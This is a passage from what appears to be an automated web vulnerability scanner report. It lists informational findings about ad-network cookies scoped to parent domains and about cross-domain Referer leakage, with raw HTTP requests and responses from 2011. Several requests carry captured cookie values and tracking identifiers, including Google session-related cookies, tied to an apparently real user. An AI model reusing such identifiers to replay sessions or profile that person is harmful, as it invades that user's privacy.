The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 11:13:03 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.11. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 13:08:19 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.12. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Sun, 17-Jun-2012 13:44:52 GMT; Path=/
pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; Domain=.contextweb.com; Expires=Fri, 22-Jun-2012 13:44:52 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=le30aXzs06hH00001jDClaTYi0cbS00001kkgaaRpa038X00001jkozaUUI0c7w00001iWmhaSED0cb1000019bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000jNtbaUUO09sO00000jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001kSEGaZWa03sY00001iOnPaUUK03sY00001jxYWaUMm0bn800001jpQXaRwv05qO00001kPIlaZWa03sY00000hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001lEOyaYx40cie00001jkncaRBL0c7w00001eBxyaZST03iw00001jBrJaXnt035P00001kSTxaRuU06yP00001lFP5aZRG0dSu00001jDBSaZUd0cbS00001kSCsaZWb03sY00001jNtfaUUK09sO00000kCKXaXnm08HG00001jDDva+WE0cbS00002kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001iz3QaZRG0bnA00001lu0naYvn0czN00002kcLvaUUK0dCb00001iyQIaYRd0bnA00001; expires=Wed, 21-Sep-2011 09:44:27 GMT; domain=.serving-sys.com; path=/
B3=8Vlw0000000001u+78ox0000000001vcanad0000000001vc9j0T0000000001u+990p0000000001v5aJmE0000000001vcajpm0000000001vc9ZD90000000001uQ9cm20000000001uTajpn0000000000vc8SCH0000000001vcalVe0000000001u+amoJ0000000001v5a0fG0000000001uZajUW0000000001u+89+70000000001uQ9XzA0000000001u+9xv30000000002vf9xvo0000000001vc93LT0000000001uQ84hR0000000002uQ8n.z0000000000v99xux0000000001uXa9it0000000001uQ9D2u0000000000u+9X5M0000000001uW8SC30000000001v9aF7y0000000002v89iQ70000000002uQ9D2y0000000000u+9.360000000001v89xuy0000000001uX7dOu0000000001uY9XJ40000000001uRajpj0000000001vc90mq0000000001v59qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+4ZUH0000000002vc; expires=Wed, 21-Sep-2011 09:44:27 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.14. http://cw-m.d.chango.com/m/cw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cw-m.d.chango.com
Path:	/m/cw

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Sun, 20 Jun 2021 13:44:51 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.15. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Tue, 20-Dec-2011 13:45:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.16. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.turn.com
Path:	/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:45:04 GMT; Path=/
uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:45:04 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.17. http://delivery.steelhousemedia.com/serve previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:44:59 GMT;Max-Age=31536000
view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:44:59 GMT;Max-Age=315360000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

10.18. http://future.grapeshot.co.uk/tech/channels.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://future.grapeshot.co.uk
Path:	/tech/channels.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=1207876142; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.19. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9;Path=/;Domain=.w55c.net;Expires=Sat, 22-Jun-13 13:44:53 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.20. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 21-Sep-2011 14:18:14 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)(>Mwz%)_`z[:mPKd<7=nqDc+`//:U50e293-Kz>?9QDV::r>Q*pjBCL[#D6X7kL*`yn$9pmGg(Ia9kM%1ZsJJ6-DlTXCurMu^Qaa+cRkset9O99VxIrQ-Ks_SLTx(.J*bmlp984Bne0$n'j>y)eR)clD^xhsm37e)_E:<)HczGF1]Q.mpSas0svgG3(L$8pRcmy$`'bJ!6^qTdtf9$7v53xgP7X2_Y93Rswp>5*Zf6gRLLoga`]OO>qerGoCTdIO6'ozan-S9NNx4ke#b(P:mhK.6679r$b?S=WFFK9Nx:d00m'/'B1t%$w0UP?^vO^_fgN#-`@$b/Zk*Xzo3f!F6'9w1otH)ZY7uy(3p(I-a=Y9UZ%4<Krwx2fs'kTVc33sZ#YWoRal)qVP(c%#Cx7G-!qWL5VQUn0@=1#gv3@61bcW(**/3_[`JU2?51u68MA$>Z+X`WwEGd?)%Q9+!3-%e_>V]7buLolsqjbVa28EI:Kw77ow#5JA#`OaaU>U]b%n]kSwZw.[p.o)ABl:NB-1G2*VWkq6TL>BCTFe*SzG76[lme!.bcBV)LnZXVNJP2/:U9WP6tCCjcnD7^-TT9eYw17_WX$]NHk@@TUp5Rj2qi(M-C5dlS+bjaS<aeoZ!f^tj5C6c[; path=/; expires=Wed, 21-Sep-2011 14:18:14 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=lC2SdqOvB0CULZJ2o68HQAAAAAAAAAhAlC2SdqOvB0CVLZJ2o68HQASgEsiy1kYb_ayDGovBdy8jSwNOAAAAAFowAAC1AAAANQEAAAIAAABsowUA0WMAAAEAAABVU0QAVVNEACwB-gDcAE0AiBABAgUCAQQAAAAAvx4LvQAAAAA.&tt_code=vert-343&udj=uf%28%27a%27%2C+15288%2C+1308838692%29%3Buf%28%27r%27%2C+369516%2C+1308838692%29%3Bppv%2811776%2C+%271965494350742986756%27%2C+1308838692%2C+1311430692%2C+62058%2C+25553%29%3B&cnd=!MiWOwAjq5AMQ7MYWGAAg0ccBMAA43AFAAEi1AlAAWABgVWgAcBp45OMBgAG2AYgB6kSQAQGYAQGgAQGoAQOwAQG5AcrmMqCjrwdAwQHK5jKgo68HQMkBDYnuKtqU7z_QAQDZAQAAAAAAAPA_4AEA&ccd=!gwXrLgjq5AMQ7MYWGNHHASAA&referrer=http://www.sqlmag.com/categories/category/t-sql-powershell-scripting&pp=TgNLIwAMRXwK7FqhSgx7WGgyMGjGr-K8n9EYZg&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7-rWI0sDTvyKMaG1sQfY9rHQBO_675oCp439xBrj246PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0wMDgzMDMzNDgyMjM1MDcxsgEOd3d3LnNxbG1hZy5jb226AQozMDB4MjUwX2FzyAEJ2gFEaHR0cDovL3d3dy5zcWxtYWcuY29tL2NhdGVnb3JpZXMvY2F0ZWdvcnkvdC1zcWwtcG93ZXJzaGVsbC1zY3JpcHRpbmeYAvYTwAIEyAKrgqUOqAMB6APXAugD3AX1AwIAAESABq6xlomLuorgeQ%26num%3D1%26sig%3DAGiWqtysFd00odSGYkWsoHD3rfwjq1M7dQ%26client%3Dca-pub-0083033482235071%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0083033482235071&output=html&h=250&slotname=2791141801&w=300&lmt=1308856691&channel=ca-penton_js&ad_type=Google%20Links&color_link=%232d6a98&color_text=%23000000&color_url=%232d6a98&flash=10.3.181&url=http%3A%2F%2Fwww.sqlmag.com%2Fcategories%2Fcategory%2Ft-sql-powershell-scripting&dt=1308838691808&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308838691823&frm=4&adk=190405238&ga_vid=1181228728.1308836680&ga_sid=1308838668&ga_hid=1701678051&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&ref=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858&fu=0&ifi=1&dtd=32&xpc=6vRjOQpsSA&p=http%3A//www.sqlmag.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; uuid2=3420415245200633085; anj=Kfw)(BE0w%(?P6JADAX?9v!$i@!bvm^WJ2Xe97*l`7e:q1uf<3Y8C?.@r]xH*dk:MB/hiH^VhWgXZ^/W`=h_NVb'qg_*RPJ>saG/)xWy9tmAE>WZ?iwp.EyEtCZ/iQ+w/H!$qbd`tXr^jSzT/[j.OJti:D(Elk1N(u(YW3/7w^`cs6R?FZ=*tbD.YJ=`=@PwrG^a9sed:h:3RiF%6-#j8?%Swn5'g2>JZ!RFFtEOw4E(M0:aQNfLxLJfYlX9d6Nqc<meGol_`jrmUb8=bkyn71d>O#H23%Zm(G1UHv2^(H0JD2mK#x0gVu^MFoH-q$feA8S'r>/Hc%ri!yDiIlo$Cla7W`J]V/+<FT@e`tO)3rp[nhl0^Q^tKMfVIw/B3]X5K=U8guwx)_$aeL(#MOCL0+-Sg-ZX!Q(6QIg9s?q`f`9HP[GG$!)N(vnkvrdxMwd'W21e2jFQ^=2Jbns*JRNcZg$!0dXd'SV$`_RK1m+gv@7r)Ly.fog>wrj.E7fysll'oxtOV*2GC0A2EUu6r(X0+G!bi)cD5Rb5gtcv')0:(=cKM21hhWWjwh4kzQPFpwqW#><@=KpSs9eh]QaA[$@H`QP8)BJ5nfz(]<!xQ%`N:re5$sSH]J`ckCVgvt?BRGTv-W<[f606(Xf:]D.[+!FUJs9[dwmU4_cH!`>uEg3s

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 24-Jun-2011 14:18:14 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 21-Sep-2011 14:18:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfw)(>Mwz%)_`z[:mPKd<7=nqDc+`//:U50e293-Kz>?9QDV::r>Q*pjBCL[#D6X7kL*`yn$9pmGg(Ia9kM%1ZsJJ6-DlTXCurMu^Qaa+cRkset9O99VxIrQ-Ks_SLTx(.J*bmlp984Bne0$n'j>y)eR)clD^xhsm37e)_E:<)HczGF1]Q.mpSas0svgG3(L$8pRcmy$`'bJ!6^qTdtf9$7v53xgP7X2_Y93Rswp>5*Zf6gRLLoga`]OO>qerGoCTdIO6'ozan-S9NNx4ke#b(P:mhK.6679r$b?S=WFFK9Nx:d00m'/'B1t%$w0UP?^vO^_fgN#-`@$b/Zk*Xzo3f!F6'9w1otH)ZY7uy(3p(I-a=Y9UZ%4<Krwx2fs'kTVc33sZ#YWoRal)qVP(c%#Cx7G-!qWL5VQUn0@=1#gv3@61bcW(**/3_[`JU2?51u68MA$>Z+X`WwEGd?)%Q9+!3-%e_>V]7buLolsqjbVa28EI:Kw77ow#5JA#`OaaU>U]b%n]kSwZw.[p.o)ABl:NB-1G2*VWkq6TL>BCTFe*SzG76[lme!.bcBV)LnZXVNJP2/:U9WP6tCCjcnD7^-TT9eYw17_WX$]NHk@@TUp5Rj2qi(M-C5dlS+bjaS<aeoZ!f^tj5C6c[; path=/; expires=Wed, 21-Sep-2011 14:18:14 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 23 Jun 2011 14:18:14 GMT
Content-Length: 1022

document.write('<a href="http://ib.adnxs.com/click?ZmZmZmZmBEBmZmZmZmYEQAAAAAAAAAhAlC2SdqOvB0CVLZJ2o68HQASgEsiy1kYb_ayDGovBdy8jSwNOAAAAAFowAAC1AAAANQEAAAIAAABsowUA0WMAAAEAAABVU0QAVVNEACwB-gDcAE0AiBABA
...[SNIP]...

10.21. http://id.google.com/verify/EAAAAFhuTOo3sUWykPGD2UWXAkw.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAFhuTOo3sUWykPGD2UWXAkw.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=48=8vvwdAUE-e9yvODwxiWN33pAF3gY8OBaa4kbDWFR=hfQIdMCbGkmGKmGv; expires=Fri, 23-Dec-2011 11:10:23 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAFhuTOo3sUWykPGD2UWXAkw.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=malware+fbi+arrest+idg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=_D9DDFTBZJwMT8t4feCKQrNj0fytvbO-4PlYJmQD=zRC3mp6p2uDXazTD; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=8vvwdAUE-e9yvODwxiWN33pAF3gY8OBaa4kbDWFR=hfQIdMCbGkmGKmGv; expires=Fri, 23-Dec-2011 11:10:23 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 23 Jun 2011 11:10:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.22. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLvvNzMNZjhn3tNDUOn9Rw8CYJMzyjPPqEpc6O1HdA/zzwOIp+sMJM4VFVYB3OpUU0Eex6sURtMmxQwz6+tPZPApyOqS7g99GMSlNrlAMps04cSedAn0IHXaA6HiLUb7qM4X8AOUEawZhuwWzp6c0KbcO2TUC5j9Vhfie38FUKM8aPJdRgSI8gH4DgLkhRAW1voZVLV22LWHD9x/LShkRAFDrVPJ6+nAR7qS2QAMkg+4V6hmeFK470y5/JreGq1OsV7CmpKIKeQX0bSU/sz+CBDDbXgJKhUFq0XV88GGTWey45AOSM5gGf/VqI1WQntr0wWO/v1K5LbeIw4wmQPr6j42qIH51QjKTPKQP6YS0oGeHR9Nxa2oQiLcrS22kph/+KKvHbRMFKtHjw5eMujbD9tXhWgCGl10krsYyKQN6sn5aBkMs/oENeO0I5AkdqCk4US+kRmDl449iPXMzxpZJvVuZQDT9tMHRt9vWVtNi2Q/tStqPDiho1pOU70sNzyrtDPMlI/drhVLnJEZaVQPGTYGx6kucKJySP5FU+SitbJPyVTemroXui3iD8kNAOsweLrT2Eh3p08TbSrpAI6Z8HIna/jCWCZG0Sp7Kl1Y74SO7Dh2T3m54BdqXEsPYwS6S9m3aWIK7fnONxYsBrCSfQN2Y/h5GAhbAReubQq4SMH47piiZ8kZ5LPKtMR2yW2wqx2hTjeLghk782jfxS5UrWh4OLjdOuHdbTpckQtOdMOOrkb5BVOJnhNwZxmuvUBKsIp0peqVZ9iGb/aGfOMdGu4Qkcu/bZlCp7uRcwgKnOnbYBaBkLE7LZg+WO87vrtSKJPAO5wDoTy7iJUSdTdaKDuZ6v5sLNcvn1QlDZ/6oImvljd2T7BeVlJXZM6vJx8mWsoBt59CH/Fw8xuPDuiyi8nFSERZO6xMToJD46zqmoSGNsZkTqb2KE717ePaHqAfO+HtJ/7ESMU0kV159tivauG9q9ojiwbFmgTsYnCFLNz/OYnIXX4NkvmXBkP653UAPTCDtiH+FFfy9uC4xdNOfTXDwzUMzig99guz8s+jgtMuCZpEVWNU4qE4phlHHqJsQZacTdsz5EXFvlSiA+HN3yCDoXUpWowvKCmLmYh3H4iY+Ad+lG0irVW50iYphrVJ78FMwpO1ctZfuOhAVf38gLcYAdmdCQZO6+HVhoW5/YIYrdMIAu5H0EjC+fG3UFMYo7HmokVwE//3QYTJ1nj+oYhQEhBk9hBS7qjzktjOh1z3twgI/Fs2/lL9q4rgbKfO+HlYYEt8JUNARGj5iC2poGY+jlw+Q7uHMLeNRYoLR/z68dzL1wqM4L++E3oQE95rzHCL6VgxMC1Wo9S7vjrx3pf9uV+lWVJRED8M95ESou7uETnWfT1iu9fLZ2KBiKt6eyheQvVDWWcZvNIxBBfnCN1mEGFEzZR+2DOAQE7L08ytW0rWVMgb3JMkJ7HvAh0w90/LNix9KbSSR1sAPSSIqpVb1YETC128nQNgOUXKrP1VYdYc9znE6q2qpqp3gbBtpx2do0ASA6mnBlNFShdDkVlPpKtekr9afgmaeCEsCCSUZFsDYNLj8HVL/kJSu3h9fsdlY5yMLOEoJ+KgifbUZhAhe/LqoUkdFHosX6botHcT27YxhTbq9uF5oVjnG7Y112pFY6MtQUvC7SXhtC/wAwvHdX3DhiG7Pxw/Y0sDcyKpZuI7TRZsRNGtqcRlVlAaQ/RIdgIlWHEFJcajqhexFsZpjRpkFzNbtZ9xlJARDg==; Domain=.revsci.net; Expires=Fri, 22-Jun-2012 11:11:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11. Cross-domain Referer leakage previous next
There are 25 instances of this issue:

http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
http://ad.doubleclick.net/adj/sql.home/database
http://ad.doubleclick.net/adj/sql.home/database
http://ad.doubleclick.net/adj/sql.home/database
http://ad.doubleclick.net/adj/sql.home/database
http://ad.doubleclick.net/adj/sql.home/database
http://ad.doubleclick.net/adj/sql.home/general
http://ad.doubleclick.net/adj/sql.home/general
http://ad.doubleclick.net/adj/sql.home/general
http://adadvisor.net/adscores/g.js
http://bh.contextweb.com/bh/drts
http://cdn.optmd.com/V2/85280/214235/index.html
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://delivery.steelhousemedia.com/serve
http://dp.specificclick.net/
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js
http://license.icopyright.net/rights/offer.act
http://license.icopyright.net/rights/tag.act

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

11.1. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=ibnlive&adSpace=tech&tagKey=2057624979&th=24693616604&tKey=undefined&size=728x90&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fibnlive.in.com%2Fgeneralnewsfeed%2Fnews%2Ffinancial-firms-required-to-beef-up-computer-security%2F735356.html&f=0&p=16609087&a=1&rnd=16610418

The response contains the following link to another domain:

http://ad.z5x.net/st?ad_type=ad&ad_size=728x90&section=762900

Request

Response

11.2. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fut.gb.tr/news.Internet

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=3;dcopt=ist;sz=728x90;;gs_cat=NONE;ord=852301204?

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png

Request

GET /adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=3;dcopt=ist;sz=728x90;;gs_cat=NONE;ord=852301204? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
